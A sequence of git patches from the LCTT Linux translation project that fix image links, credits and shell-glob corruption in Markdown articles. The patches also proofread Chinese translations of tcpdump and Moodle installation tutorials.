- **[ Give yourself a technology career advantage with[InfoWorld's Deep Dive technology reports and Computerworld's career trends reports][2]. GET A 15% DISCOUNT through Jan. 15, 2017: Use code 8TIISZ4Z. ]**
-
If you're running desktop Linux, then how to unzip it really depends on the desktop environment you are running, as different DEs have different ways of doing the same thing. So the easiest way is to use the command line.
`$ unzip NOOBS.zip`
From 5aa9b7acbfa93245ea750ae888812b6ef9f1ee51 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:23:29 +0800
Subject: [PATCH 115/371] =?UTF-8?q?=E6=98=BE=E7=A4=BA=E9=85=8D=E5=9B=BE?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...4 The Best Linux Apps - Distros of 2017.md | 22 +++++++++----------
1 file changed, 11 insertions(+), 11 deletions(-)
diff --git a/sources/tech/20171214 The Best Linux Apps - Distros of 2017.md b/sources/tech/20171214 The Best Linux Apps - Distros of 2017.md
index 1491ff1157..11bf2b558a 100644
--- a/sources/tech/20171214 The Best Linux Apps - Distros of 2017.md
+++ b/sources/tech/20171214 The Best Linux Apps - Distros of 2017.md
@@ -1,6 +1,6 @@
The Best Linux Apps & Distros of 2017
======
-[![best linux distros 2017][1]][2]
+![best linux distros 2017][1]
**In this post we look back at the best Linux distro and app releases that helped define 2017.**
@@ -18,7 +18,7 @@ But enough waffle: on we go!
## Distros
-### 1\. Ubuntu 17.10 'Artful Aardvark'
+### 1. Ubuntu 17.10 'Artful Aardvark'
[![Ubuntu 17.10 desktop screenshot][3]][4]
@@ -40,7 +40,7 @@ The recurring theme among the [Ubuntu 17.10 reviews][9] was the Artful Aardvark
And with an long-term support release next up, long may the enthusiasm for it continue!
-### 2\. Solus 3
+### 2. Solus 3
[![][10]][11]
@@ -60,7 +60,7 @@ If you like the look of Budgie you can use it on Ubuntu without damaging your ex
If you get bored over the holidays I highly recommended you [download the Solus MATE edition][15] too. It combines the strength of Solus with the meticulously maintained MATE desktop, a combination that works incredibly well together.
-### 3\. Fedora 27
+### 3. Fedora 27
[![][16]][17]
@@ -72,7 +72,7 @@ Fedora 27 features GNOME 3.26 (and all the niceties that brings, like color emoj
## Apps
-### 4\. Firefox 57 (aka 'Firefox Quantum').
+### 4. Firefox 57 (aka 'Firefox Quantum').
[![firefox quantum on ubuntu][20]][21]
@@ -88,7 +88,7 @@ Like Ubuntu, Firefox has got its mojo back.
Firefox will roll out support for client side decoration on the GNOME desktop (a feature already available in the latest nightly builds) sometime in 2018. This feature, along with further refinements to the finely-tuned under-the-hood mechanics, will add more icing atop an already fantastic base!
-### 5\. Ubuntu for Windows
+### 5. Ubuntu for Windows
[![][22]][23]
@@ -106,7 +106,7 @@ The stocking of Ubuntu, openSUSE and Fedora on the shelves of the Windows Store
For many regular Linux will always be preferable to the rather odd hybrid that is the Windows Subsystem for Linux (WSL). But for others, mandated to use Microsoft products for work or study, the leeway to use Linux is a blessing.
-### 6\. GIMP 2.9.6
+### 6. GIMP 2.9.6
[![gimp on ubuntu graphic][25]][26]
@@ -116,7 +116,7 @@ While GIMP 2.10 itself didn't see release in 2017 two sizeable development updat
The former of these added ** experimental multi-threading in GEGL** (a fancy way of saying the app can now make better use of multi-core processors). It also added HiDPI tweaks, introduced color coded layer tags, added metadata editor, new filters, crop presets and -- take a breath -- improved the 'quit' dialog.
-### 7\. GNOME Desktop
+### 7. GNOME Desktop
[![GNOME 3.26 desktop with apps][28]][29]
@@ -130,7 +130,7 @@ Both release came packed full of new features, and both bought an assembly of re
GNOME isn't stopping there. GNOME 3.28 is due for release in March with plenty more changes, improvements and app updates planned. GNOME 3.28 is looking like it will be used in Ubuntu 18.04 LTS.
-### 8\. Atom IDE
+### 8. Atom IDE
[![Atom IDE][32]][32]
@@ -140,7 +140,7 @@ But, for me, it was rather sudden appearance of **Atom IDE ** that caught my att
[Atom IDE][33] is a set of packages for the Atom code editor that add more traditional [IDE][34] capabilities like context-aware auto-completion, code navigation, diagnostics, and document formatting.
-### 9\. Stacer 1.0.8
+### 9. Stacer 1.0.8
[![Stacer is an Ubuntu cleaner app][35]][36]
@@ -159,7 +159,7 @@ Stacer has 8 dedicated sections offering control over system maintenance duties,
The app is now my go-to recommendation for anyone looking for an Ubuntu system cleaner. Which reminds me: I should get around to adding the app to our list of ways to [free up space on Ubuntu][37]… Chores, huh?!
-### 10\. Geary 0.12
+### 10. Geary 0.12
[![Geary 0.11 on Ubuntu 16.04][38]][39]
From 43f49484c8c51edf935f561f38d6e79a16840b9f Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:28:38 +0800
Subject: [PATCH 116/371] =?UTF-8?q?=E9=85=8D=E5=9B=BE?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20171214 IPv6 Auto-Configuration in Linux.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20171214 IPv6 Auto-Configuration in Linux.md b/sources/tech/20171214 IPv6 Auto-Configuration in Linux.md
index 85108d8b6f..547b404b82 100644
--- a/sources/tech/20171214 IPv6 Auto-Configuration in Linux.md
+++ b/sources/tech/20171214 IPv6 Auto-Configuration in Linux.md
@@ -1,7 +1,7 @@
IPv6 Auto-Configuration in Linux
======
-![](http://www.omgubuntu.co.uk)
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner_5.png?itok=3kN83IjL)
In [Testing IPv6 Networking in KVM: Part 1][1], we learned about unique local addresses (ULAs). In this article, we will learn how to set up automatic IP address configuration for ULAs.
From c484b89530558f44d97d7a58b56aaa59ff993a36 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:31:04 +0800
Subject: [PATCH 117/371] =?UTF-8?q?fix=20=E5=86=85=E5=AE=B9=E9=97=AE?=
=?UTF-8?q?=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ache SSL certificate with Let-s Encrypt on CentOS - RHEL.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md b/sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md
index d6a173336c..1d85d60731 100644
--- a/sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md
+++ b/sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md
@@ -1,5 +1,6 @@
Create a free Apache SSL certificate with Let’s Encrypt on CentOS & RHEL
======
+
Let's Encrypt is a free, automated & open certificate authority that is supported by ISRG, Internet Security Research Group. Let's encrypt provides X.509 certificates for TLS (Transport Layer Security) encryption via automated process which includes creation, validation, signing, installation, and renewal of certificates for secure websites.
In this tutorial, we are going to discuss how to create an apache SSL certificate with Let's Encrypt certificate on Centos/RHEL 6 & 7\. To automate the Let's encrypt process, we will use Let's encrypt recommended ACME client i.e. CERTBOT, there are other ACME Clients as well but we will be using Certbot only.
@@ -95,7 +96,7 @@ For creating a cron job, use
**# crontab -e**
- **0 0 1 * comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE Makefile published README.md sign.md sources translated 选题模板.txt 中文排版指北.md sh path/certbot-auto renew >> /var/log/letsencrypt.log**
+ **0 0 1 * * sh path/certbot-auto renew >> /var/log/letsencrypt.log**
This was our tutorial on how to install and use let's encrypt on CentOS , RHEL 6 & 7 for creating a free SSL certificate for Apache servers. Please do leave your questions or queries down below.
From 513a6ee32311d35449d7d3824ded453f42e7fef7 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:34:25 +0800
Subject: [PATCH 118/371] =?UTF-8?q?=E7=89=88=E6=9D=83=E4=BF=A1=E6=81=AF?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...8 GeckoLinux Brings Flexibility and Choice to openSUSE.md | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md b/sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md
index a4e8d9657e..af1ba82706 100644
--- a/sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md
+++ b/sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md
@@ -1,6 +1,11 @@
GeckoLinux Brings Flexibility and Choice to openSUSE
======
![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/gecko-linux.jpg?itok=bjKVnW1q)
+
+GeckoLinux is a unique distro that offers a few options that openSUSE does not. Jack Wallen takes a look.
+
+Creative Commons Zero
+
I've been a fan of SUSE and openSUSE for a long time. I've always wanted to call myself an openSUSE user, but things seemed to get in the way--mostly [Elementary OS][1]. But every time an openSUSE spin is released, I take notice. Most recently, I was made aware of [GeckoLinux][2]--a unique take (offering both Static and Rolling releases) that offers a few options that openSUSE does not. Consider this list of features:
* Live DVD / USB image
From 3f01c20cca524f3a8b09bfc6456f797711974f51 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:36:49 +0800
Subject: [PATCH 119/371] =?UTF-8?q?=E9=85=8D=E5=9B=BE?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md b/sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md
index a085692994..2bc4fe93e4 100644
--- a/sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md
+++ b/sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md
@@ -11,7 +11,7 @@ Installing omf is not a big deal. All you have to do is just run the following c
curl -L https://get.oh-my.fish | fish
```
-[![][2]][3]
+![][3]
Once the installation has completed, you will see the the prompt has automatically changed as shown in the above picture. Also, you will notice that the current time on the right of the shell window.
From e88a235ddc5c9e9a365738b6f900afcefd858fd3 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:38:49 +0800
Subject: [PATCH 120/371] fix content bug
---
...ount The Number Of Files And Folders-Directories In Linux.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md b/sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md
index b3cc45af13..9e8de9c467 100644
--- a/sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md
+++ b/sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md
@@ -121,7 +121,7 @@ To experiment this, i'm going to create totally 7 files and 2 folders (5 regular
**Example-10 :** Count all files in the current directory by using the echo command in combination with the wc command. `4` indicates the amount of files in the current directory.
```
-# echo core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md README.md sign.md 选题模板.txt 中文排版指北.md | wc
+# echo * | wc
1 4 39
```
From 236b2a6cf4540be6b67ef159cdec06063da52ec3 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:40:13 +0800
Subject: [PATCH 121/371] =?UTF-8?q?=E9=85=8D=E5=9B=BE=E7=89=88=E6=9D=83?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Essential Questions to Ask at Your Next Tech Interview.md | 4 ++++
1 file changed, 4 insertions(+)
diff --git a/sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md b/sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md
index 7f90ef282d..891ef48948 100644
--- a/sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md
+++ b/sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md
@@ -2,6 +2,10 @@
======
![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/os-jobs_0.jpg?itok=nDf5j7xC)
+Interviewing can be stressful, but 58 percent of companies tell Dice and the Linux Foundation that they need to hire open source talent in the months ahead. Learn how to ask the right questions.
+
+The Linux Foundation
+
The annual [Open Source Jobs Report][1] from Dice and The Linux Foundation reveals a lot about prospects for open source professionals and hiring activity in the year ahead. In this year's report, 86 percent of tech professionals said that knowing open source has advanced their careers. Yet what happens with all that experience when it comes time for advancing within their own organization or applying for a new roles elsewhere?
Interviewing for a new job is never easy. Aside from the complexities of juggling your current work while preparing for a new role, there's the added pressure of coming up with the necessary response when the interviewer asks "Do you have any questions for me?"
From 3dded768307551dcab0491c23b0a8b6195d7ec25 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 09:28:59 +0800
Subject: [PATCH 122/371] PRF:20171109 Learn how to use tcpdump command with
examples.md
@lujun9972
---
...ow to use tcpdump command with examples.md | 65 ++++++++++---------
1 file changed, 33 insertions(+), 32 deletions(-)
diff --git a/translated/tech/20171109 Learn how to use tcpdump command with examples.md b/translated/tech/20171109 Learn how to use tcpdump command with examples.md
index 578580ef4c..b683dd0005 100644
--- a/translated/tech/20171109 Learn how to use tcpdump command with examples.md
+++ b/translated/tech/20171109 Learn how to use tcpdump command with examples.md
@@ -1,20 +1,21 @@
-通过案例学习 TCPDUMP 命令
+通过实例学习 tcpdump 命令
======
-Tcpdump 是一个很常用的网络包分析工具,可以用来显示通过网络传输到本系统的 TCP\IP 以及其他网络的数据包。Tcpdump 使用 libpcap 库来抓取网络报,这个库在几乎存在于所有的 Linux/Unix 中。
-Tcpdump 可以从网卡或之前创建的数据包文件中读取内容,也可以将包写入文件中以供后续使用。必须是 root 用户或者使用 sudo 特权来运行 tcpdump。
+`tcpdump` 是一个很常用的网络包分析工具,可以用来显示通过网络传输到本系统的 TCP/IP 以及其他网络的数据包。`tcpdump` 使用 libpcap 库来抓取网络包,这个库几乎在所有的 Linux/Unix 中都有。
-在本文中,我们将会通过一些案例来演示如何使用 tcpdump 命令,但首先让我们来看看在各种 Linux 操作系统中是如何安装 tcpdump 的。
+`tcpdump` 可以从网卡或之前创建的数据包文件中读取内容,也可以将包写入文件中以供后续使用。必须是 root 用户或者使用 sudo 特权来运行 `tcpdump`。
- **(推荐阅读:[使用 iftop 命令监控网络带宽 ][1])**
+在本文中,我们将会通过一些实例来演示如何使用 `tcpdump` 命令,但首先让我们来看看在各种 Linux 操作系统中是如何安装 `tcpdump` 的。
+
+- 推荐阅读:[使用 iftop 命令监控网络带宽 ][1]
### 安装
-tcpdump 默认在几乎所有的 Linux 发行版中都可用,但若你的 Linux 上没有的话,使用下面方法进行安装。
+`tcpdump` 默认在几乎所有的 Linux 发行版中都可用,但若你的 Linux 上没有的话,使用下面方法进行安装。
#### CentOS/RHEL
-使用下面命令在 CentOS 和 RHEL 上安装 tcpdump,
+使用下面命令在 CentOS 和 RHEL 上安装 `tcpdump`,
```
$ sudo yum install tcpdump*
@@ -22,7 +23,7 @@ $ sudo yum install tcpdump*
#### Fedora
-使用下面命令在 Fedora 上安装 tcpdump,
+使用下面命令在 Fedora 上安装 `tcpdump`:
```
$ dnf install tcpdump
@@ -30,19 +31,19 @@ $ dnf install tcpdump
#### Ubuntu/Debian/Linux Mint
-在 Ubuntu/Debain/Linux Mint 上使用下面命令安装 tcpdump
+在 Ubuntu/Debain/Linux Mint 上使用下面命令安装 `tcpdump`:
```
$ apt-get install tcpdump
```
-安装好 tcpdump 后,现在来看一些例子。
+安装好 `tcpdump` 后,现在来看一些例子。
### 案例演示
#### 从所有网卡中捕获数据包
-运行下面命令来从所有网卡中捕获数据包,run the following command,
+运行下面命令来从所有网卡中捕获数据包:
```
$ tcpdump -i any
@@ -50,7 +51,7 @@ $ tcpdump -i any
#### 从指定网卡中捕获数据包
-要从指定网卡中捕获数据包,运行
+要从指定网卡中捕获数据包,运行:
```
$ tcpdump -i eth0
@@ -58,7 +59,7 @@ $ tcpdump -i eth0
#### 将捕获的包写入文件
-使用 ‘-w’ 选项将所有捕获的包写入文件,
+使用 `-w` 选项将所有捕获的包写入文件:
```
$ tcpdump -i eth1 -w packets_file
@@ -66,15 +67,15 @@ $ tcpdump -i eth1 -w packets_file
#### 读取之前产生的 tcpdump 文件
-使用下面命令从之前创建的 tcpdump 文件中读取内容
+使用下面命令从之前创建的 tcpdump 文件中读取内容:
```
$ tcpdump -r packets_file
```
-#### 获取更多的包信息并且以可读的形式显示时间戳
+#### 获取更多的包信息,并且以可读的形式显示时间戳
-要获取更多的包信息同时以可读的形式显示时间戳,使用
+要获取更多的包信息同时以可读的形式显示时间戳,使用:
```
$ tcpdump -ttttnnvvS
@@ -82,7 +83,7 @@ $ tcpdump -ttttnnvvS
#### 查看整个网络的数据包
-要获取整个网络的数据包,在终端执行下面命令
+要获取整个网络的数据包,在终端执行下面命令:
```
$ tcpdump net 192.168.1.0/24
@@ -90,13 +91,13 @@ $ tcpdump net 192.168.1.0/24
#### 根据 IP 地址查看报文
-要获取指定 IP 的数据包,不管是作为源地址还是目的地址,使用下面命令,
+要获取指定 IP 的数据包,不管是作为源地址还是目的地址,使用下面命令:
```
$ tcpdump host 192.168.1.100
```
-要指定 IP 地址是源地址或是目的地址则使用
+要指定 IP 地址是源地址或是目的地址则使用:
```
$ tcpdump src 192.168.1.100
@@ -105,43 +106,43 @@ $ tcpdump dst 192.168.1.100
#### 查看某个协议或端口号的数据包
-要查看某个协议的数据包,运行下面命令
+要查看某个协议的数据包,运行下面命令:
```
$ tcpdump ssh
```
-要捕获某个端口或一个范围的数据包,使用
+要捕获某个端口或一个范围的数据包,使用:
```
$ tcpdump port 22
$ tcpdump portrange 22-125
```
-我们也可以与 'src' 和 'dst' 选项连用来捕获指定源端口或指定目的端口的报文
+我们也可以与 `src` 和 `dst` 选项连用来捕获指定源端口或指定目的端口的报文。
-我们还可以使用 AND (与,&& ),OR ( 或。|| ) & EXCEPT (非,!) 来将两个条件组合起来。当我们需要基于某些条件来分析网络报文是非常有用。
+我们还可以使用“与” (`and`,`&&`)、“或” (`or`,`||` ) 和“非”(`not`,`!`) 来将两个条件组合起来。当我们需要基于某些条件来分析网络报文是非常有用。
-#### 使用 AND
+#### 使用“与”
-可以使用 'and' 或者符号 '&&' 来将两个或多个条件组合起来。比如,
+可以使用 `and` 或者符号 `&&` 来将两个或多个条件组合起来。比如:
```
$ tcpdump src 192.168.1.100 && port 22 -w ssh_packets
```
-#### 使用 OR
+#### 使用“或”
-OR 会检查是否匹配命令所列条件中的其中一条,像这样
+“或”会检查是否匹配命令所列条件中的其中一条,像这样:
```
$ tcpdump src 192.168.1.100 or dst 192.168.1.50 && port 22 -w ssh_packets
$ tcpdump port 443 or 80 -w http_packets
```
-#### 使用 EXCEPT
+#### 使用“非”
-当我们想表达不匹配某项条件时可以使用 EXCEPT,像这样
+当我们想表达不匹配某项条件时可以使用“非”,像这样:
```
$ tcpdump -i eth0 src port not 22
@@ -149,15 +150,15 @@ $ tcpdump -i eth0 src port not 22
这会捕获 eth0 上除了 22 号端口的所有通讯。
-我们的教程至此就结束了,在本教程中我们讲解了如何安装并使用 tcpdump 来捕获网络数据包。如有任何疑问或建议,欢迎留言。
+我们的教程至此就结束了,在本教程中我们讲解了如何安装并使用 `tcpdump` 来捕获网络数据包。如有任何疑问或建议,欢迎留言。
--------------------------------------------------------------------------------
via: http://linuxtechlab.com/learn-use-tcpdump-command-examples/
-作者:[Shusain ][a]
+作者:[Shusain][a]
译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 695b2ceff1c34d4bc4b4ebb31c8695eb65d2668c Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 09:29:30 +0800
Subject: [PATCH 123/371] PUB:20171109 Learn how to use tcpdump command with
examples.md
@lujun9972 https://linux.cn/article-9210-1.html
---
.../20171109 Learn how to use tcpdump command with examples.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171109 Learn how to use tcpdump command with examples.md (100%)
diff --git a/translated/tech/20171109 Learn how to use tcpdump command with examples.md b/published/20171109 Learn how to use tcpdump command with examples.md
similarity index 100%
rename from translated/tech/20171109 Learn how to use tcpdump command with examples.md
rename to published/20171109 Learn how to use tcpdump command with examples.md
From c0f7c0fbfb0762e1ac05f6d10a40b64fe4a7bdd1 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 09:47:12 +0800
Subject: [PATCH 124/371] PRF:20171214 How to Install Moodle on Ubuntu 16.04.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@stevenzdg988 这篇用心了。不过一些显而易见的说明可以不加,要加也也请以 “(LCTT
译注:XXXX)”的形式在合适的位置加上即可。
---
...4 How to Install Moodle on Ubuntu 16.04.md | 111 +++++++++++-------
1 file changed, 67 insertions(+), 44 deletions(-)
diff --git a/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md b/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
index 0422dbb2c3..0a0286f661 100644
--- a/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
+++ b/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
@@ -1,62 +1,76 @@
-怎样在 Ubuntu 16.04 下安装 Moodle(“魔灯”)
+怎样在 Ubuntu 下安装 Moodle(“魔灯”)
======
-![怎样在 Ubuntu 16.04 下安装 Moodle```“魔灯”```][1]
-关于如何在 Ubuntu 16.04 上按照指南逐步安装 Moodle 请继续往下看。Moodle (模块化面向对象动态学习环境的简称)是一种免费开源学习管理系统,为教师、学生和管理员提供个性化的学习环境。Moodle 由 Moodle 项目创建,由 [Moodle 总部][2]统一领导和协调。
+![怎样在 Ubuntu 16.04 下安装 Moodle “魔灯”][1]
-**Moodle有很多非常实用的功能,比如:**
+这是一篇关于如何在 Ubuntu 16.04 上安装 Moodle (“魔灯”)的逐步指南。Moodle (模块化面向对象动态学习环境的缩写)是一种自由而开源的学习管理系统,为教师、学生和管理员提供个性化的学习环境。Moodle 由 Moodle 项目创建,由 [Moodle 总部][2]统一领导和协调。
- * 现代和易于使用的界面
- * 个性化仪表盘
- * 协作工具和活动
- * 一体式日历
- * 简单的文本编辑器
- * 进度跟踪
- * 公告
- * 不胜枚举…
+Moodle 有很多非常实用的功能,比如:
-在本教程中,我们将指导您在 Ubuntu 16.04 VPS 上利用 Apache web服务器、MySQL 和 PHP 7 安装最新版本的 Moodle。
-### 1. 通过 SSH 登录
+* 现代和易于使用的界面
+* 个性化仪表盘
+* 协作工具和活动
+* 一体式日历
+* 简单的文本编辑器
+* 进度跟踪
+* 公告
+* 不胜枚举…
-First of all, login to your Ubuntu 16.04 VPS via SSH as user root
-首先,利用```root(是 Linux 和 Unix 系统中的超级管理员用户帐户,该帐户拥有整个系统至高无上的权力,所有对象他都可以操作。)```用户通过 SSH 登录到 Ubuntu 16.04 VPS
-### 2. 更新操作系统软件包
+在本教程中,我们将指导您在 Ubuntu 16.04 VPS 上利用 Apache web 服务器、MySQL 和 PHP 7 安装最新版本的 Moodle。(LCTT 译注:在 Ubuntu 的后继版本上的安装也类似。)
+
+### 1、 通过 SSH 登录
+
+首先,利用 root 用户通过 SSH 登录到 Ubuntu 16.04 VPS:
+
+```
+ssh root@IP_Address -p Port_number
+```
+
+### 2、 更新操作系统软件包
+
+运行以下命令更新系统软件包并安装一些依赖软件:
-运行以下命令更新系统软件包并安装一些依赖软件
```
apt-get update && apt-get upgrade
apt-get install git-core graphviz aspell
```
-### 3. 安装 Apache Web Server```(Apache WEB 服务器)```
+### 3、 安装 Apache Web 服务器
+
+利用下面命令,从 Ubuntu 软件仓库安装 Apache Web 服务器:
-利用下面命令,从 Ubuntu 软件仓库安装 Apache Web 服务器
```
apt-get install apache2
```
-### 4. 启动 Apache Web Server
+### 4、 启动 Apache Web 服务器
一旦安装完毕,启动 Apache 并使它能够在系统启动时自动启动,利用下面命令:
+
```
systemctl enable apache2
```
-### 5. 安装 PHP 7
+### 5、 安装 PHP 7
接下来,我们将安装 PHP 7 和 Moodle 所需的一些额外的 PHP 模块,命令是:
+
```
apt-get install php7.0 libapache2-mod-php7.0 php7.0-pspell php7.0-curl php7.0-gd php7.0-intl php7.0-mysql php7.0-xml php7.0-xmlrpc php7.0-ldap php7.0-zip
```
-### 6. 安装和配置 MySQL Database Server```MySQL 数据库服务器```
+### 6、 安装和配置 MySQL 数据库服务器
+
+Moodle 将大部分数据存储在数据库中,所以我们将利用以下命令安装 MySQL 数据库服务器:
-Moodle 将大部分数据存储在数据库中,所以我们将利用以下命令安装 MySQL 数据库服务器
```
apt-get install mysql-client mysql-server
```
-安装完成后,运行`mysql_secure_installation`脚本配置 MySQL 根用户```root```密码并确保 MySQL 得以安装。
-利用根用户```root```登录到 MySQL 服务器,并为 Moodle 创建一个数据库以及能访问它的用户,以下是具体操作指令:
+
+安装完成后,运行 `mysql_secure_installation` 脚本配置 MySQL 的 `root` 密码以确保 MySQL 安全。
+
+以 `root` 用户登录到 MySQL 服务器,并为 Moodle 创建一个数据库以及能访问它的用户,以下是具体操作指令:
+
```
mysql -u root -p
mysql> CREATE DATABASE moodle;
@@ -65,28 +79,32 @@ mysql> FLUSH PRIVILEGES;
mysql> \q
```
-一定要记得将`‘PASSWORD’`替换成一个安全性高强点的密码。
+一定要记得将上述 `PASSWORD` 替换成一个安全性强的密码。
-### 7. 从 GitHub ```(是一个面向开源及私有软件项目的托管平台)``` 知识库获取 Moodle
+### 7、 从 GitHub 仓库获取 Moodle
+
+接下来,切换当前工作目录,并从 GitHub 官方仓库中复制 Moodle:
-接下来,切换到当前工作目录并从 GitHub 官方知识库(存储库)中复制 Moodle`(Git是一个开源的分布式版本控制系统,可以有效、高速的处理从很小到非常大的项目版本管理。其中要利用到命令 git。以下同)`
```
cd /var/www/html/
git clone https://github.com/moodle/moodle.git
```
-切换到`“/moodle”`目录,检查所有可用的分支
+切换到 `moodle` 目录,检查所有可用的分支:
+
```
cd moodle/
git branch -a
```
-选择最新稳定版本(目前它是 MOODLE_34_ ),运行以下命令告诉 git 哪个分支可以跟踪或使用
+选择最新稳定版本(当前是 `MOODLE_34_STABLE` ),运行以下命令告诉 git 哪个分支可以跟踪或使用:
+
```
git branch --track MOODLE_34_STABLE origin/MOODLE_34_STABLE
```
-并切换至这个特定版本
+并切换至这个特定版本:
+
```
git checkout MOODLE_34_STABLE
@@ -94,20 +112,23 @@ Switched to branch 'MOODLE_34_STABLE'
Your branch is up-to-date with 'origin/MOODLE_34_STABLE'.
```
-为存储 Moodle 数据创建目录
+为存储 Moodle 数据创建目录:
+
```
mkdir /var/moodledata
```
-正确设置其所有权和访问权限
+正确设置其所有权和访问权限:
+
```
chown -R www-data:www-data /var/www/html/moodle
chown www-data:www-data /var/moodledata
```
-### 8. 配置 Apache Web Server
+### 8、 配置 Apache Web 服务器
+
+使用以下内容为您的域名创建 Apache 虚拟主机:
-使用以下内容为您的域名创建 Apache 虚拟主机
```
nano /etc/apache2/sites-available/yourdomain.com.conf
@@ -123,10 +144,10 @@ nano /etc/apache2/sites-available/yourdomain.com.conf
ErrorLog /var/log/httpd/yourdomain.com-error_log
CustomLog /var/log/httpd/yourdomain.com-access_log common
-
```
-保存文件并启用虚拟主机
+保存文件并启用虚拟主机:
+
```
a2ensite yourdomain.com
@@ -135,25 +156,27 @@ To activate the new configuration, you need to run:
service apache2 reload
```
-最后,重启 Apache WEB 服务器,以使配置生效
+最后,重启 Apache Web 服务器,以使配置生效:
+
```
service apache2 reload
```
-### 9. 接下来按照提示完成安装
+### 9、 接下来按照提示完成安装
-现在,点击“http://yourdomain.com”`(在浏览器的地址栏里输入以上域名并访问 Apache WEB 服务器)`,按照提示完成Moodle的安装。有关如何配置和使用 Moodle 的更多信息,您可以查看其[官方文档][4]。
+现在,点击 “http://yourdomain.com”(LCTT 译注:在浏览器的地址栏里输入以上域名以访问 Apache WEB 服务器),按照提示完成 Moodle 的安装。有关如何配置和使用 Moodle 的更多信息,您可以查看其[官方文档][4]。
-如果您使用我们的[优化的 Moodle 托管主机服务][5],您不必在 Ubuntu 16.04 上安装 Moodle,在这种情况下,您只需要求我们的专业 Linux 系统管理员在 Ubuntu 16.04 上安装和配置最新版本的 Moodle。他们将提供 24×7 及时响应的服务。
+如果您使用我们的[优化的 Moodle 托管主机服务][5],您不必在 Ubuntu 16.04 上安装 Moodle,在这种情况下,您只需要求我们的专业 Linux 系统管理员在 Ubuntu 16.04 上安装和配置最新版本的 Moodle。他们将提供 24×7 及时响应的服务。(LCTT 译注:这是原文作者——一个主机托管商的广告~)
+
+**PS.** 如果你喜欢这篇关于如何在 Ubuntu 16.04 上安装 Moodle 的帖子,请在社交网络上与你的朋友分享,或者留下你的回复。谢谢。
-**PS.** 如果你喜欢这篇关于如何在 Ubuntu 16.04 上安装 Moodle 的帖子,请在社交网络上与你的朋友分享,使用左边的按钮或者留下你的回复。谢谢。
--------------------------------------------------------------------------------
via: https://www.rosehosting.com/blog/how-to-install-moodle-on-ubuntu-16-04/
作者:[RoseHosting][a]
译者:[stevenzdg988](https://github.com/stevenzdg988)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
